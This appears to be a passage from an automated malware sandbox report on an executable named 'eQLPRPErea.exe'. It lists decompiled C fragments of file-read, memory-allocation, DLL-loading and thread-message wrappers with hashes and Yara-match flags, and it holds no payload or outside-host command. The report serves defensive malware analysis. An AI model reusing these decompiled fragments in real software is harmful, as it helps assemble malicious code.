Instruction Fuzzy Hash: 29D0C9B2809EB0BAE31322149C04B9F7A999F5A710F4944A2F540B62E5D2785D818FEE

Uniqueness

Uniqueness Score: -1.00%

Function 00405640, Relevance: 5.0, APIs: 4, Instructions: 30
stringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405640(CHAR* _a4, CHAR* _a8) {
				int _t10;
				int _t15;
				CHAR* _t16;

				_t15 = lstrlenA(_a8);
				_t16 = _a4;
				while(lstrlenA(_t16) >= _t15) {
					 *(_t15 + _t16) =  *(_t15 + _t16) & 0x00000000;
					_t10 = lstrcmpiA(_t16, _a8);
					if(_t10 == 0) {
						return _t16;
					}
					_t16 = CharNextA(_t16);
				}
				return 0;
			}

0x0040564c
0x0040564e
0x00405676
0x0040565b
0x00405660
0x0040566b
0x00000000
0x00405688
0x00405674
0x00405674
0x00000000

APIs

lstrlenA.KERNEL32(00000000,?,00000000,00000000,00405844,00000000,[Rename],?,?,00000000,000000F1,?), ref: 00405647
lstrcmpiA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00000000,00405844,00000000,[Rename],?,?,00000000,000000F1,?), ref: 00405660
CharNextA.USER32(00000000,?,?,00000000,000000F1,?), ref: 0040566E
lstrlenA.KERNEL32(00000000,00000000,?,00000000,00000000,00405844,00000000,[Rename],?,?,00000000,000000F1,?), ref: 00405677

Memory Dump Source

Source File: 00000001.00000002.703506030.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.703501549.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.703512735.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.703519233.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.703528650.0000000000414000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.703538539.0000000000420000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.703576080.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.703598048.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.703605312.0000000000438000.00000002.00020000.sdmp Download File

Similarity

API ID: lstrlen$CharNextlstrcmpi
String ID:
API String ID: 190613189-0
Opcode ID: f6e5a91ec7db47e15e60a1c150abbc6d75b5c44b2e203e3a2d493a33770f074b
Instruction ID: 346b90764f0d90fbcc61368962881b27d577bfee3f98b87c3a37ae2f5c1fe9f2
Opcode Fuzzy Hash: f6e5a91ec7db47e15e60a1c150abbc6d75b5c44b2e203e3a2d493a33770f074b
Instruction Fuzzy Hash: 7EF02736209C91EFC2125B288C00A2B6A94EFA1311B540A7AF444F2140C33A9811ABBB

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: eQLPRPErea.exe PID: 6956 Parent PID: 6876 eQLPRPErea.exeCOMMON

Executed Functions

Function 0041827A, Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 38
filenativeCOMMON

Download Yara Rule

C-Code - Quality: 37%

			E0041827A(intOrPtr __eax, void* __ecx, void* __edx, char _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, char _a28, intOrPtr _a32, char _a36) {
				intOrPtr _v0;
				void* _t19;
				void* _t31;
				void* _t32;
				intOrPtr* _t33;
				void* _t35;

				 *0x55230d2b = __eax;
				_t14 = _v0;
				_t33 = _v0 + 0xc48;
				E00418DD0(_t31, _t14, _t33,  *((intOrPtr*)(_t14 + 0x10)), 0, 0x2a);
				_t4 =  &_a36; // 0x413a21
				_t6 =  &_a28; // 0x413d62
				_t12 =  &_a4; // 0x413d62
				_t19 =  *((intOrPtr*)( *_t33))( *_t12, _a8, _a12, _a16, _a20, _a24,  *_t6, _a32,  *_t4, _t32, _t35, __ecx); // executed
				return _t19;
			}

0x0041827c
0x00418283
0x0041828f
0x00418297
0x0041829c
0x004182a2
0x004182bd
0x004182c5
0x004182c9

APIs

NtReadFile.NTDLL(b=A,5E972F59,FFFFFFFF,?,?,?,b=A,?,!:A,FFFFFFFF,5E972F59,00413D62,?,00000000), ref: 004182C5

Strings

b=A, xrefs: 004182BD, 004182C4
b=A, xrefs: 004182A2, 004182B0
!:A, xrefs: 0041829C, 004182A8

Memory Dump Source

Source File: 00000003.00000002.735263364.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: FileRead
String ID: !:A$b=A$b=A
API String ID: 2738559852-704622139
Opcode ID: 8b6e3c338e851e524f8fbccb74b9022f35b9fca1e8b38238c33761c42d1304bb
Instruction ID: 6aa6475e8bab00d956222c33f4d939f40f681ea8c6ff85aedc739d2f2a7e5ce9
Opcode Fuzzy Hash: 8b6e3c338e851e524f8fbccb74b9022f35b9fca1e8b38238c33761c42d1304bb
Instruction Fuzzy Hash: 33F0E7B2210208AFCB04DF89DC80EEB77EDEF8C754F018249BA0D97241D630EC118BA4

Uniqueness

Uniqueness Score: -1.00%

Function 00418280, Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 36
filenativeCOMMON

Download Yara Rule

C-Code - Quality: 37%

			E00418280(intOrPtr _a4, char _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, char _a32, intOrPtr _a36, char _a40) {
				void* _t18;
				void* _t27;
				intOrPtr* _t28;

				_t13 = _a4;
				_t28 = _a4 + 0xc48;
				E00418DD0(_t27, _t13, _t28,  *((intOrPtr*)(_t13 + 0x10)), 0, 0x2a);
				_t4 =  &_a40; // 0x413a21
				_t6 =  &_a32; // 0x413d62
				_t12 =  &_a8; // 0x413d62
				_t18 =  *((intOrPtr*)( *_t28))( *_t12, _a12, _a16, _a20, _a24, _a28,  *_t6, _a36,  *_t4); // executed
				return _t18;
			}

0x00418283
0x0041828f
0x00418297
0x0041829c
0x004182a2
0x004182bd
0x004182c5
0x004182c9

APIs

NtReadFile.NTDLL(b=A,5E972F59,FFFFFFFF,?,?,?,b=A,?,!:A,FFFFFFFF,5E972F59,00413D62,?,00000000), ref: 004182C5

Strings

b=A, xrefs: 004182BD, 004182C4
b=A, xrefs: 004182A2, 004182B0
!:A, xrefs: 0041829C, 004182A8

Memory Dump Source

Source File: 00000003.00000002.735263364.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: FileRead
String ID: !:A$b=A$b=A
API String ID: 2738559852-704622139
Opcode ID: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
Instruction ID: 51f5fae1d88b5840d166f8ea9f31b1482cd02544441b85bb92b9de754d914906
Opcode Fuzzy Hash: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
Instruction Fuzzy Hash: F0F0A4B2200208ABCB14DF89DC81EEB77ADAF8C754F158249BA1D97241DA30E8518BA4

Uniqueness

Uniqueness Score: -1.00%

Function 00409B30, Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON

Download Yara Rule

APIs

LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 00409BA2

Memory Dump Source

Source File: 00000003.00000002.735263364.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Load
String ID:
API String ID: 2234796835-0
Opcode ID: 54eed7fb54c4bb33c5ecf3c62be074d2fec7e96364ab3bba8fcd8ce07f2b6dc1
Instruction ID: 4e6e3ee69d5942d72351b9e79d7f2bfe549f68bd28f2ef5b77caac8f1f18b979
Opcode Fuzzy Hash: 54eed7fb54c4bb33c5ecf3c62be074d2fec7e96364ab3bba8fcd8ce07f2b6dc1
Instruction Fuzzy Hash: BB0152B5E0010DA7DB10DAA1DC42FDEB378AB54308F0041A5E918A7281F635EB54C795

Uniqueness

Uniqueness Score: -1.00%

Function 004181CA, Relevance: 1.5, APIs: 1, Instructions: 40filenativeCOMMON

Download Yara Rule

APIs

NtCreateFile.NTDLL(00000060,00408B03,?,00413BA7,00408B03,FFFFFFFF,?,?,FFFFFFFF,00408B03,00413BA7,?,00408B03,00000060,00000000,00000000), ref: 0041821D

Memory Dump Source

Source File: 00000003.00000002.735263364.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 1d887e3f6420a875d9d023c46edfc1bfec1ff3c4e4ccdba01d0fcc2e96458da9
Instruction ID: 3b05307eb4481b3886391544bfbde69ff39b9c20c556f1d43b8892235c5a6f5f
Opcode Fuzzy Hash: 1d887e3f6420a875d9d023c46edfc1bfec1ff3c4e4ccdba01d0fcc2e96458da9
Instruction Fuzzy Hash: AD01CDB2200108AFCB04DF99DC95DDB37ADAF8C754F158248FA1D97251C630EC51CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 004181D0, Relevance: 1.5, APIs: 1, Instructions: 40filenativeCOMMON

Download Yara Rule

APIs

NtCreateFile.NTDLL(00000060,00408B03,?,00413BA7,00408B03,FFFFFFFF,?,?,FFFFFFFF,00408B03,00413BA7,?,00408B03,00000060,00000000,00000000), ref: 0041821D

Memory Dump Source

Source File: 00000003.00000002.735263364.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
Instruction ID: 4ba06d0811943408d915368c3acdb1aee86cb039c5ce671b45e9a6de03e682c0
Opcode Fuzzy Hash: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
Instruction Fuzzy Hash: EAF0B2B2200208ABCB08CF89DC85EEB77ADAF8C754F158248BA0D97241C630E8518BA4

Uniqueness

Uniqueness Score: -1.00%

Function 004183B0, Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON

Download Yara Rule

APIs

NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,00418FA4,?,00000000,?,00003000,00000040,00000000,00000000,00408B03), ref: 004183E9

Memory Dump Source

Source File: 00000003.00000002.735263364.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
Instruction ID: 5f1ba135279249ad747bfdca3347611d303f78695a7cb9da664d5d0d2719559c
Opcode Fuzzy Hash: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
Instruction Fuzzy Hash: 4EF015B2200208ABCB14DF89DC81EEB77ADAF88754F118249BE0897281C630F810CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 004182FA, Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON

Download Yara Rule

APIs

NtClose.NTDLL(00413D40,?,?,00413D40,00408B03,FFFFFFFF), ref: 00418325

Memory Dump Source

Source File: 00000003.00000002.735263364.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: 3874762776a310fdd7205f94c40c782f805f9775841fbaa3ff23ddc0edaf8f56
Instruction ID: 8f758cd0a430345a421471d6de364132e1fa3594c4216d00456b4761d05fee50
Opcode Fuzzy Hash: 3874762776a310fdd7205f94c40c782f805f9775841fbaa3ff23ddc0edaf8f56
Instruction Fuzzy Hash: D2E0C231200204BBE710EFD8CC45EE73B69EF84360F144059BA1C6B682C530FA00C7D0

Uniqueness

Uniqueness Score: -1.00%

Function 00418300, Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON

Download Yara Rule

APIs

NtClose.NTDLL(00413D40,?,?,00413D40,00408B03,FFFFFFFF), ref: 00418325

Memory Dump Source

Source File: 00000003.00000002.735263364.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
Instruction ID: e0948211a995ee673693cff6b37ba25287d5fac55aefcf59dfc2265e20a22c74
Opcode Fuzzy Hash: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
Instruction Fuzzy Hash: EAD012752003146BD710EF99DC45ED7775CEF44750F154559BA185B282C570F90086E0

Uniqueness

Uniqueness Score: -1.00%

Function 00AA98F0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00AA98FA

Memory Dump Source

Source File: 00000003.00000002.735980279.0000000000A40000.00000040.00000001.sdmp, Offset: 00A40000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: ca9673f3ae0644b396a1594a7c4336876b21773c0ba6c7f527f01b7f528083ec
Instruction ID: 3d1615de6c56f06f0ff5e36b46861abd4723f7fadd185fb075f4862fd2935f2c
Opcode Fuzzy Hash: ca9673f3ae0644b396a1594a7c4336876b21773c0ba6c7f527f01b7f528083ec
Instruction Fuzzy Hash: E190026160100503D24171694404656040ED7D1381F91C032A1014555FDA659992F171

Uniqueness

Uniqueness Score: -1.00%

Function 00AA9860, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00AA986A

Memory Dump Source

Source File: 00000003.00000002.735980279.0000000000A40000.00000040.00000001.sdmp, Offset: 00A40000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 474b4846cb7e3150ab55ec08d1e9969b35fb9b48e5218bfae338c75501cddc2d
Instruction ID: 6df4891800f47df5f9e08221899be906ae1fcf80be08c15367bcbe41161ac993
Opcode Fuzzy Hash: 474b4846cb7e3150ab55ec08d1e9969b35fb9b48e5218bfae338c75501cddc2d
Instruction Fuzzy Hash: 0590027120100413D25161694504747040DD7D1381F91C432A0414558EE6969952F161

Uniqueness

Uniqueness Score: -1.00%

Function 00AA9840, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00AA984A

Memory Dump Source

Source File: 00000003.00000002.735980279.0000000000A40000.00000040.00000001.sdmp, Offset: 00A40000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: df0676b926bb5472795a346498651246e71f42d804a780eeda38b72e3b04fadc
Instruction ID: 331cc2321284339b9588ba9105258c812fadb2e59b93484b8013687dd2800182
Opcode Fuzzy Hash: df0676b926bb5472795a346498651246e71f42d804a780eeda38b72e3b04fadc
Instruction Fuzzy Hash: 15900261242041535685B1694404547440AE7E1381B91C032A1404950DD566A856E661

Uniqueness

Uniqueness Score: -1.00%

Function 00AA99A0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00AA99AA

Memory Dump Source

Source File: 00000003.00000002.735980279.0000000000A40000.00000040.00000001.sdmp, Offset: 00A40000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: ae21ca3e4c32c633432756de54acf6eeefc6ae974910485529e618fc5eac9993
Instruction ID: f49a0107b9a24f2d1451da864ef388e1cba7168369bc5c709a1ee77fd4b7d807
Opcode Fuzzy Hash: ae21ca3e4c32c633432756de54acf6eeefc6ae974910485529e618fc5eac9993
Instruction Fuzzy Hash: 269002A134100443D24061694414B460409D7E2341F51C035E1054554ED659DC52B166

Uniqueness

Uniqueness Score: -1.00%

Function 00AA95D0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00AA95DA

Memory Dump Source

Source File: 00000003.00000002.735980279.0000000000A40000.00000040.00000001.sdmp, Offset: 00A40000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: ff8dac8ab9cde65165966810d1f137b3e885e3d67f8e3d053847fb572b21d313
Instruction ID: 015ec985d69ca0388917617d075288e35ce77591b3fdcf7ce383e8298028bb3d
Opcode Fuzzy Hash: ff8dac8ab9cde65165966810d1f137b3e885e3d67f8e3d053847fb572b21d313
Instruction Fuzzy Hash: 2D9002A120200003424571694414656440ED7E1341F51C031E1004590ED5659891B165

Uniqueness

Uniqueness Score: -1.00%

Function 00AA9910, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00AA991A

Memory Dump Source

Source File: 00000003.00000002.735980279.0000000000A40000.00000040.00000001.sdmp, Offset: 00A40000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: a82f4fe4707a46e40235d3fcdbe986c6af214773b6a1d2925c56fe3a1d79f335
Instruction ID: a2b8023129af706a9904be323226642d2fc4e06943a47bfcf3b7b67adb9b6ac0
Opcode Fuzzy Hash: a82f4fe4707a46e40235d3fcdbe986c6af214773b6a1d2925c56fe3a1d79f335
Instruction Fuzzy Hash: 879002B120100403D280716944047860409D7D1341F51C031A5054554FD6999DD5B6A5

Uniqueness

Uniqueness Score: -1.00%

Function 00AA9540, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00AA954A

Memory Dump Source

Source File: 00000003.00000002.735980279.0000000000A40000.00000040.00000001.sdmp, Offset: 00A40000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: ff61d4b89cc592a6f92bac2b60aa8507def5ef27d2ad820030280c01ed977935
Instruction ID: 6fdc963d377834b0a064d8214de8bbad113d7f58b15d2d6f1667bfcf27c78586
Opcode Fuzzy Hash: ff61d4b89cc592a6f92bac2b60aa8507def5ef27d2ad820030280c01ed977935
Instruction Fuzzy Hash: 5C900265211000030245A5690704547044AD7D6391751C031F1005550DE6619861A161

Uniqueness

Uniqueness Score: -1.00%

Function 00AA96E0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00AA96EA

Memory Dump Source

Source File: 00000003.00000002.735980279.0000000000A40000.00000040.00000001.sdmp, Offset: 00A40000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: b84cd31270c16cea646e6f1572b786bc9f134eabf36d529e01961f4f05f96de5
Instruction ID: b62f8a6b413fb2177cdc4edd5fefbc2f2935ab137269409b8ec9dd0c6d14d3a7
Opcode Fuzzy Hash: b84cd31270c16cea646e6f1572b786bc9f134eabf36d529e01961f4f05f96de5
Instruction Fuzzy Hash: 0D90027120108803D2506169840478A0409D7D1341F55C431A4414658ED6D59891B161

Uniqueness

Uniqueness Score: -1.00%

Function 00AA9A20, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00AA9A2A

Memory Dump Source

Source File: 00000003.00000002.735980279.0000000000A40000.00000040.00000001.sdmp, Offset: 00A40000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 4dba4587f79ef45a55e2cbf286225c860941c0fe209a95e3da76f7aa65347950
Instruction ID: 991ae33388391909576dd74927282791e14e25267cd5d5ee5abb74eb19a36c74
Opcode Fuzzy Hash: 4dba4587f79ef45a55e2cbf286225c860941c0fe209a95e3da76f7aa65347950
Instruction Fuzzy Hash: 8B900261601000434280717988449464409FBE2351B51C131A0988550ED5999865A6A5

Uniqueness

Uniqueness Score: -1.00%

Function 00AA9A00, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00AA9A0A

Memory Dump Source

Source File: 00000003.00000002.735980279.0000000000A40000.00000040.00000001.sdmp, Offset: 00A40000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 732c9e6a75c5b9a01135da0f5770f8be45ba7ec58b1801fc82b76b218e484222
Instruction ID: e6a4cf25f9f5dac928e8201cc246889bd2c2f20e61966c61743369ccb8fbb7fe
Opcode Fuzzy Hash: 732c9e6a75c5b9a01135da0f5770f8be45ba7ec58b1801fc82b76b218e484222
Instruction Fuzzy Hash: D490027120140403D2406169481474B0409D7D1342F51C031A1154555ED6659851B5B1

Uniqueness

Uniqueness Score: -1.00%

Function 00AA9660, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00AA966A

Memory Dump Source

Source File: 00000003.00000002.735980279.0000000000A40000.00000040.00000001.sdmp, Offset: 00A40000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: c42421be56613383b2e6fd6afcb73933afe3cf6e9ed368bacdfaed5aa88b00df
Instruction ID: 4ec6d0ab08d1ee59a6b4864bcf481c1903aaa66e194012fb41418201fa245892
Opcode Fuzzy Hash: c42421be56613383b2e6fd6afcb73933afe3cf6e9ed368bacdfaed5aa88b00df
Instruction Fuzzy Hash: F590027120100803D2C07169440468A0409D7D2341F91C035A0015654EDA559A59B7E1

Uniqueness

Uniqueness Score: -1.00%

Function 00AA9A50, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00AA9A5A

Memory Dump Source

Source File: 00000003.00000002.735980279.0000000000A40000.00000040.00000001.sdmp, Offset: 00A40000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 5a4f160dc68b6b12274edf87a56c7cb7fd88fb8bc9d77bb1a06be446e458bae4
Instruction ID: c0574123a9398dfb9eb4c910035748f7a6044fb5c1d95491d4f3f7f3fd387dff
Opcode Fuzzy Hash: 5a4f160dc68b6b12274edf87a56c7cb7fd88fb8bc9d77bb1a06be446e458bae4
Instruction Fuzzy Hash: EB90026121180043D34065794C14B470409D7D1343F51C135A0144554DD9559861A561

Uniqueness

Uniqueness Score: -1.00%

Function 00AA97A0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00AA97AA

Memory Dump Source

Source File: 00000003.00000002.735980279.0000000000A40000.00000040.00000001.sdmp, Offset: 00A40000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 25f84dd11038c7b066379deeaa3e0df1034076d379e80c4d829861b55b877b00
Instruction ID: ceb4d3130027b1f5628589beb108d1fdc226f9c86e3ca676adc37d3f1e3a5871
Opcode Fuzzy Hash: 25f84dd11038c7b066379deeaa3e0df1034076d379e80c4d829861b55b877b00
Instruction Fuzzy Hash: 3F90026130100003D280716954186464409E7E2341F51D031E0404554DE9559856A262

Uniqueness

Uniqueness Score: -1.00%

Function 00AA9780, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00AA978A

Memory Dump Source

Source File: 00000003.00000002.735980279.0000000000A40000.00000040.00000001.sdmp, Offset: 00A40000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: aeddd7eaa7688dc2b7f568ecf6efaccdaffc1a7dc0826d42344f0790fa4fee82
Instruction ID: c26b373f7e9dcfbc1e949bd09492a6bf0a8ebf2337154de2992019c4d7549f9e
Opcode Fuzzy Hash: aeddd7eaa7688dc2b7f568ecf6efaccdaffc1a7dc0826d42344f0790fa4fee82
Instruction Fuzzy Hash: 3290026921300003D2C07169540864A0409D7D2342F91D435A0005558DD9559869A361

Uniqueness

Uniqueness Score: -1.00%

Function 00AA9FE0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00AA9FEA

Memory Dump Source

Source File: 00000003.00000002.735980279.0000000000A40000.00000040.00000001.sdmp, Offset: 00A40000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: b87d78f86d86a2a28f86b58fc1247820c0cb6246caed4aa68a63794e9e395b29
Instruction ID: c3b827b3f31b74d0e0caca9a2511dcdda4f382e711fed3e9a857d7da4aa8c421
Opcode Fuzzy Hash: b87d78f86d86a2a28f86b58fc1247820c0cb6246caed4aa68a63794e9e395b29
Instruction Fuzzy Hash: 1290027131114403D250616984047460409D7D2341F51C431A0814558ED6D59891B162

Uniqueness

Uniqueness Score: -1.00%

Function 00AA9710, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00AA971A

Memory Dump Source

Source File: 00000003.00000002.735980279.0000000000A40000.00000040.00000001.sdmp, Offset: 00A40000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 1f5c26069d83f87e1adc59bc2fa5b8b303d916ae1a0ba6c8e3c36d33b5f734b2
Instruction ID: 2b057bafcf461e0b902f9482d1ee2a5fe4d3375714656251b7a950b0c951bc90
Opcode Fuzzy Hash: 1f5c26069d83f87e1adc59bc2fa5b8b303d916ae1a0ba6c8e3c36d33b5f734b2
Instruction Fuzzy Hash: CC90027120100403D24065A954086860409D7E1341F51D031A5014555FD6A59891B171

Uniqueness

Uniqueness Score: -1.00%

Function 004088C0, Relevance: .1, Instructions: 92COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.735263364.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 67bb4e2207c22d687f6acc024d55c7e0c161e5d4599185de851a30ee67947c6b
Instruction ID: 4c2b1df36aa7b29bb0fae7ecfb93cd688d28708cc461f9fe29ca3c1f3973371e
Opcode Fuzzy Hash: 67bb4e2207c22d687f6acc024d55c7e0c161e5d4599185de851a30ee67947c6b
Instruction Fuzzy Hash: EC213CB2D442085BCB10E6649D42BFF73AC9B50304F04057FF989A3181FA38BB498BA7

Uniqueness

Uniqueness Score: -1.00%

Function 004184A0, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004184A0(intOrPtr _a4, char _a8, long _a12, long _a16) {
				void* _t10;
				void* _t15;

				L00418DD0(_t15, _a4, _a4 + 0xc70,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x34);
				_t6 =  &_a8; // 0x413526
				_t10 = RtlAllocateHeap( *_t6, _a12, _a16); // executed
				return _t10;
			}

0x004184b7
0x004184c2
0x004184cd
0x004184d1

APIs

RtlAllocateHeap.NTDLL(&5A,?,00413C9F,00413C9F,?,00413526,?,?,?,?,?,00000000,00408B03,?), ref: 004184CD

Strings

&5A, xrefs: 004184C2, 004184CC

Memory Dump Source

Source File: 00000003.00000001.697538747.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: AllocateHeap
String ID: &5A
API String ID: 1279760036-1617645808
Opcode ID: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
Instruction ID: 6eed1dfa6fdd4b996c8079955bb5808ea645f65af4e2973490dba1d49a230398
Opcode Fuzzy Hash: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
Instruction Fuzzy Hash: 94E012B1200208ABDB14EF99DC41EA777ACAF88654F118559BA085B282CA30F9108AB0

Uniqueness

Uniqueness Score: -1.00%

Function 00407270, Relevance: 1.6, APIs: 1, Instructions: 55
threadwindowCOMMON

Download Yara Rule

C-Code - Quality: 82%

			E00407270(void* __eflags, intOrPtr _a4, long _a8) {
				char _v67;
				char _v68;
				void* _t12;
				intOrPtr* _t13;
				int _t14;
				long _t21;
				intOrPtr* _t25;
				void* _t26;
				void* _t30;

				_t30 = __eflags;
				_v68 = 0;
				L00419D30( &_v67, 0, 0x3f);
				E0041A910( &_v68, 3);
				_t12 = E00409B30(_t30, _a4 + 0x1c,  &_v68); // executed
				_t13 = L00413E40(_a4 + 0x1c, _t12, 0, 0, 0xc4e7b6d6);
				_t25 = _t13;
				if(_t25 != 0) {
					_t21 = _a8;
					_t14 = PostThreadMessageW(_t21, 0x111, 0, 0); // executed
					_t32 = _t14;
					if(_t14 == 0) {
						_t14 =  *_t25(_t21, 0x8003, _t26 + (E00409290(_t32, 1, 8) & 0x000000ff) - 0x40, _t14);
					}
					return _t14;
				}
				return _t13;
			}

0x00407270
0x0040727f
0x00407283
0x0040728e
0x0040729e
0x004072ae
0x004072b3
0x004072ba
0x004072bd
0x004072ca
0x004072cc
0x004072ce
0x004072eb
0x004072eb
0x00000000
0x004072ed
0x004072f2

APIs

PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 004072CA

Memory Dump Source

Source File: 00000003.00000001.697538747.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: MessagePostThread
String ID:
API String ID: 1836367815-0
Opcode ID: 2611248cf2981be21f72ca7afad4f10f88413beaa9ea5ad5021ab45b4f53d4d7
Instruction ID: 34c16447600cfe3bfc53875ba7b31b7f06d917fb68e10caa6e1b72df1d8a1719
Opcode Fuzzy Hash: 2611248cf2981be21f72ca7afad4f10f88413beaa9ea5ad5021ab45b4f53d4d7
Instruction Fuzzy Hash: 9901D431A8022877E720A6959C03FFE776C5B00B55F05046EFF04BA1C2E6A87A0542EA

Uniqueness

Uniqueness Score: -1.00%

